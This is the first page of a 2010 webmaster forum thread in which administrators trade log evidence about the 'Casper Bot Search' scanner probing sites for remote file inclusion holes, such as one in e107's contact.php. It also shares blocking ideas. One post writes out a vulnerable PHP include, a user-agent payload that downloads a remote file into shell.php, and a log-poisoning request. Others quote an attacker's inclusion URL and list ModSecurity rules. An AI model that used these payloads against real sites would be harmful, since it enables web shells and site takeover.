homepage Welcome to WebmasterWorld Guest from 54.237.71.86
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Visit PubCon.com
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

This 41 message thread spans 2 pages: 41 ( [1] 2 > >     
casper bot search attempts to infect sites
user agent changing almost daily
dstiles




msg:4160993
 10:47 pm on Jun 28, 2010 (gmt 0)

Seen quite a few of these over the past few days, generally in groups of half a dozen-ish. (Title is complete UA with correct spelling.)

Behaviour is odd: every hit seems to be to the same site and page with (probably) the same unique querystring (this denotes an actual file to download or view). At the END of the querystring the file's extension (.ged) is replaced by:
.%20%E2%80%A6/contact.php

This seems to be consistent, although I've only carried out a few spot-checks. It also indicates a hack attempt, since the site is not PHP anyway. It's odd that the characters are upper-ASCII apart from the space, suggesting a non-Latin character set.

Hits come from different IPs, sometimes repeats of previous ones (perhaps 5 or 6 IPs involved). All IPs seems to be from server farms apart from one which could be a server on a static business DSL line. Servers include softlayer and a multi-country (RIPE) server farm.

Initially I thought "distributed bot" but being from servers this is unlikely unless it's a proper bot such as camont, and there is almost nothing to indicate it might be (SEs show next to nothing apart from logs, which indicate I'm not alone).

Possibly it's a broken bot (replacing only the file extension seems dumb unless there is an exploitable system that includes those three letters).

Any ideas, folks?

 

BitStrike




msg:4161313
 1:34 pm on Jun 29, 2010 (gmt 0)

One of my web sites was hacked a few hours ago and I think this is done by this bot. Or it just search for vulnerability and reports it to the actual hacker. All files were removed and index.php and casper.php along with some other files were created in the root folder. There was a message like "hacked by casper" inside one of the files.
The site was build on e107, don't remember the actual version but it was definitely not the latest one.
More info is on the [e107.org...] web site.

keyplyr




msg:4161576
 7:56 pm on Jun 29, 2010 (gmt 0)

The the UA string begin with casper?

dstiles




msg:4161687
 10:41 pm on Jun 29, 2010 (gmt 0)

If you mean me, keyplyr, The UA I gave in the title is the complete UA. :)

More today, including russian servers (which seems to predominate) and an australian server.

BitStrike - what were the logged URLs and querystrings?

Can't see how it could be a hack unless the querystring syntax broke the server? Is there a "ged" within your site's pagenames/querystrings?

I suppose the contact form page could compromise a server if it stores data into a SQL database but then there would have to be a second payload hit, I should have thought, which is a bit wasteful.

Just had another search on google. This forum/topic at the top and thereafter almost nothing but logs until about #60 when it gives a forum reference. Sadly google seems to have screwed up its translation service because it translated german into german (and in another case french into french). They really are getting worse! :(

rowan194




msg:4161803
 2:01 am on Jun 30, 2010 (gmt 0)

Here are the 3 UAs I've found so far-

Casper Bot Search
dex Bot Search
Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

I'm 403'ing anything presenting this user agent, then a script which runs every 15 mins adds a firewall rule for that IP. (They won't even be able to connect to the server, let alone request anything)

I've counted 268 unique IPs since just over a week ago, so I wouldn't be surprised if the requests are coming from compromised boxes.

dstiles




msg:4162198
 4:21 pm on Jun 30, 2010 (gmt 0)

I haven't seen dex bot.

I trapped the mozilla one for a couple of reasons without checking further but yes, it does have the contact.php querystring.

147 hits for contact.php, 142 for casper.

dstiles




msg:4162417
 10:50 pm on Jun 30, 2010 (gmt 0)

I've had a look at a few logs that google returns in serps. They do not seem to include the /contact.php but always seem to be the same querystring, though I've only checked half a dozen logs. The querystrings in those I looked at carry the word "casper" as in:

/casper/Ckrid1.txt?

(this seems to be a common point in the logs).

I tried looking in the actual file (a gedcom) for the name "casper" and it's not there so another theory bites the dust.

One google posting mentions casper doing a POST but very little other info. A couple of the serps relate it to exploits.

I have now found a couple of other forums saying this is an exploit attempt aimed at various things including PDFs. Type the following, including quotes, into google:

"casper bot search" exploit

One translated site mentions a "casper rule" which defines the life of something: not sure what as I ran out of patience trying to translate a wiki.

What I can't understand is its persistent hits on a single site/page/querystring. Every single hit, apart from the 404s it generates. For any kind of bot or exploit this is stupid.

thetrasher




msg:4162854
 4:53 pm on Jul 1, 2010 (gmt 0)

UA of "CASPER RFI CRACK Bot" seems to have been changed.

Yesterday:
$ua->agent('Casper Bot Search');
and
my $uagent = "Casper Bot Search";

Today:
$ua->agent('Mozilla/5.0');
and
my $uagent = "Mozilla/5.0";
dstiles




msg:4163650
 7:57 pm on Jul 2, 2010 (gmt 0)

Haven't seen that but it's now coming in with exactly the same querystring but with the UA:

sledink bot search

I guess this will morph a few more times as traps develop to kill known UAs. Generalisation helps!

enigma1




msg:4163909
 10:24 am on Jul 3, 2010 (gmt 0)

$ua->agent('Casper Bot Search'); ........ etc.


Looks like a classic hack attempt.

example: vulnerable local script contains code
<?php
include($_GET['p'].".php");
?>

Attacker synthesizes user agent code (sample you may see in the server logs not encoded they use all kinds of things)
<?php
fwrite(fopen('shell.php','w'),
file_get_contents('http://www.example.com/injection.txt'));
?>

it is then utilized with a server request from the attacker:
index.php?p=/var/log/apache/access_log%00

executing the php code or try to see if the scripts disclose any other info.

I hope you get the idea and this is not original by any means there lots of discussions over the web if you want to search in depth. The code logged as a UA can have many variations.

Also they're trying different combinations based on server type and application language.

thetrasher




msg:4163960
 2:58 pm on Jul 3, 2010 (gmt 0)

Another UA:
rk q kangen
dstiles




msg:4164110
 10:06 pm on Jul 3, 2010 (gmt 0)

Three or four variations on "x bot search" UA today. Still hitting the same site.page.querystring exactly with one variation from contact.php to discover.

incrediBILL




msg:4165009
 12:57 am on Jul 6, 2010 (gmt 0)

Yikes!

I haven't been paying attention but this one is nasty

I've seen UAs of "Casper Bot Search", "rk q kangen" and "MaMa CaSpEr"

They're all trying to find ways to upload files to my site such as:
"somepage.html?path=http://www.example.com/www/data/casper/Ckrid1.txt?"

I would block anything with "/casper/" in the query string as an added measure of protection.

dstiles




msg:4165439
 9:42 pm on Jul 6, 2010 (gmt 0)

Not just casper. I would suggest anything with "bot search" in the UA as that seems to be common to many (all?) I've seen so far, including "dex" and "plaNETWORK" (sic).

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

All those I've seen seem to come from compromised servers from ThePlanet down to tin-pot little RIP ones I've never encountered before. In fact there have been a lot of the latter!

I've only caught two new IPs today (although several old ones) so perhaps they're running out of server farms I haven't yet blocked.

And most are from server farms, with just two or three from business ranges that are probably running open servers.

I still can't understand why they're only hitting one site out of several dozen, and only a single page. Seems very inefficient to me. But hey! let's root for inefficiency! :)

Dijkgraaf




msg:4165494
 12:21 am on Jul 7, 2010 (gmt 0)

Same bot, new UA MaMa CaSpEr
Also pointing a parameter to Ckrid1.txt

Ujang




msg:4165657
 9:24 am on Jul 7, 2010 (gmt 0)

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

How about to just allow several popular bot to access your site? Additionally one could perform DNS reverse lookup to ensure the origin of that bot.

popular UA: [user-agents.org...]

how to verify bot: [google.com...]

----

Below could be another way to identify a bad bot..

source: Google Webmaster Blog..In order to fetch from the "official" Googlebot IP range, the bot has to respect robots.txt and our internal hostload conventions so that Google doesn't crawl you too hard.

then you might create hidden link > block it via robot.txt > see if any bot reach that link > get the ip > block it!

just my 2cents

maximillianos




msg:4165737
 12:30 pm on Jul 7, 2010 (gmt 0)

How can you tell if your server has been compromised? We see this bot hitting our logs (only about 30 attempts since June 21st).

I don't see a new "index.php" or "casper.php" in my root. Any other symptoms to watch out for?

maximillianos




msg:4165742
 12:41 pm on Jul 7, 2010 (gmt 0)

I may be worth noting that there is a city named Casper in Wyoming. Not sure if that affects anyone who is blocking "Casper" in the query string.

profo




msg:4165893
 4:37 pm on Jul 7, 2010 (gmt 0)

It appears to be an e107 issue, with a security bug in contact.php. Another user agent I found is: "kmccrew Bot Search".

@max, symptoms not clear. One may consider to block POST queries with a user agent as mentioned above (not: query strings).

dstiles




msg:4165989
 6:23 pm on Jul 7, 2010 (gmt 0)

Ujang, thanks but I have it covered. I'm merely speculating on hits I see and trying to help out here. :)

incrediBILL




msg:4166020
 7:21 pm on Jul 7, 2010 (gmt 0)

One may consider to block POST queries with a user agent as mentioned above (not: query strings)


The hits on my site aren't POSTS, they are GETS, so the query string is where I block the attack by actually restricting anything with "http:" in the query string to prevent anything from being uploaded since the rest of the attack vectors seem to be random.

Of course this will break some software/sites so I don't recommend it for everyone, but it stops it cold on my server.

maximillianos




msg:4166077
 8:41 pm on Jul 7, 2010 (gmt 0)

Mine are GET requests as well.

caribguy




msg:4166104
 9:26 pm on Jul 7, 2010 (gmt 0)

Profo are you sure e107 is related? Haven't seen 'Casper' at all.

e107 probes: e107.css on May 25 to the ip address with the old Toata dragostea UA, and contact.php on June 14 to a handful of domains with a Googlebot UA.

dstiles




msg:4166155
 10:35 pm on Jul 7, 2010 (gmt 0)

All the casper hits today were POSTs. Haven't checked earlier logs but the pattern is the same in my security logs and always trying to hit contact.php. The contact.php in the querystring looks like some reaction to the simple POST to contact.php (without a querystring), which precedes the querystring hit. Both hits get 403's.

incrediBILL




msg:4166167
 10:52 pm on Jul 7, 2010 (gmt 0)

OK, I stand corrected, most of the activity today is totally different from the past few days.

Mostly seeing this coming from So. Korea:
"POST /I[DEX]887 HTTP/1.1" "MaMa CaSpEr"


I don't even know what the heck "/I[DEX]887" is or why anyone would try to post to it but those stupid scripts tried about 30 times with some variations.

Also had a couple of "contact.php" hits from Germany with a Firefox UA:
"POST /contact.php HTTP/1.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"


Wonder why the sudden shift from GET to POST?

At a minimum the POST no longer exposes the source of the file they're attempting to upload in a log file so it makes it a little harder to figure out the source of the hacked computer and take it down.

maximillianos




msg:4166197
 12:33 am on Jul 8, 2010 (gmt 0)

It seems to have given up our site for now (knock on wood). We last saw it on the 5th when it was still using the GET method.

That is unless it is under a name we have not checked for... which is highly likely.

frontpage




msg:4166457
 1:10 pm on Jul 8, 2010 (gmt 0)

A few ModSecurity 2.x rules

SecRule HTTP_User-Agent "Casper" "deny,log,status:403"
SecRule HTTP_User-Agent "kangen" "deny,log,status:403"
SecRule HTTP_User-Agent "MaMa" "deny,log,status:403"

incrediBILL




msg:4166772
 8:06 pm on Jul 8, 2010 (gmt 0)

Is this casper thing done?

I haven't seen a single hit from any of it's variants today.

dstiles




msg:4166827
 9:18 pm on Jul 8, 2010 (gmt 0)

Still coming as of a couple of hours ago.

If anyone is interested I have two sets of post/querystring data. Quite a difference between the two sets, one of which is an eval of a BASE64 string. Possibly other sets are different again but I only traced two.

incrediBILL




msg:4167389
 8:11 pm on Jul 9, 2010 (gmt 0)

Sharing the post data would be great
Post it and I'll edit if needed

This 41 message thread spans 2 pages: 41 ( [1] 2 > >
Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved